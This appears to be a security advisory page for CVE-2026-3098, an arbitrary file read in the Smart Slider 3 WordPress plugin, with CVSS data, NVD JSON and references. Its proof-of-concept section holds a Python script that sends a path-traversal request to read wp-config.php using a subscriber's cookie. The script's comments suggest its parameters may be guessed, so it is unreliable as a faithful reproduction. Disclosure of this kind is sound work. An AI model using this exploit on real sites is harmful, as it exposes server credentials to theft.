Security Vulnerability Report
中文
CVE-2026-3098 CVSS 6.5 MEDIUM

CVE-2026-3098

Published: 2026-03-27 04:16:04
Last Modified: 2026-04-24 16:35:20
Source: [email protected]

Description

The Smart Slider 3 plugin for WordPress is vulnerable to Arbitrary File Read in all versions up to, and including, 3.5.1.33 via the 'actionExportAll' function. This makes it possible for authenticated attackers, with Subscriber-level access and above, to read the contents of arbitrary files on the server, which can contain sensitive information.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Smart Slider 3 <= 3.5.1.33

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests def exploit(target_url, cookie): # Target endpoint usually is admin-ajax.php url = f"{target_url}/wp-admin/admin-ajax.php" # Payload data targeting the vulnerable actionExportAll function data = { "action": "nextend_smart_slider3_action", "sub_action": "exportAll", "path": "../../../../../wp-config.php" # Path traversal attempt } headers = { "Cookie": cookie } try: response = requests.post(url, data=data, headers=headers, timeout=10) if response.status_code == 200: print("[+] Request sent successfully. Check response content for file data.") print(response.text[:200]) # Print preview else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"[-] Error: {e}") # Usage # exploit("http://target-site.com", "wordpress_logged_in_xxx=...")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-3098", "sourceIdentifier": "[email protected]", "published": "2026-03-27T04:16:03.570", "lastModified": "2026-04-24T16:35:20.070", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Smart Slider 3 plugin for WordPress is vulnerable to Arbitrary File Read in all versions up to, and including, 3.5.1.33 via the 'actionExportAll' function. This makes it possible for authenticated attackers, with Subscriber-level access and above, to read the contents of arbitrary files on the server, which can contain sensitive information."}, {"lang": "es", "value": "El plugin Smart Slider 3 para WordPress es vulnerable a la lectura arbitraria de archivos en todas las versiones hasta la 3.5.1.33, inclusive, a través de la función 'actionExportAll'. Esto permite a atacantes autenticados, con acceso de nivel Suscriptor y superior, leer el contenido de archivos arbitrarios en el servidor, que pueden contener información sensible."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/smart-slider-3/tags/3.5.1.32/Nextend/SmartSlider3/Application/Admin/Sliders/ControllerSliders.php#L57", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3489689/smart-slider-3", "source": "[email protected]"}, {"url": "https://research.cleantalk.org/cve-2026-3098/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/e2ce9caf-2ca2-401c-acc7-76be2fd72f36?source=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.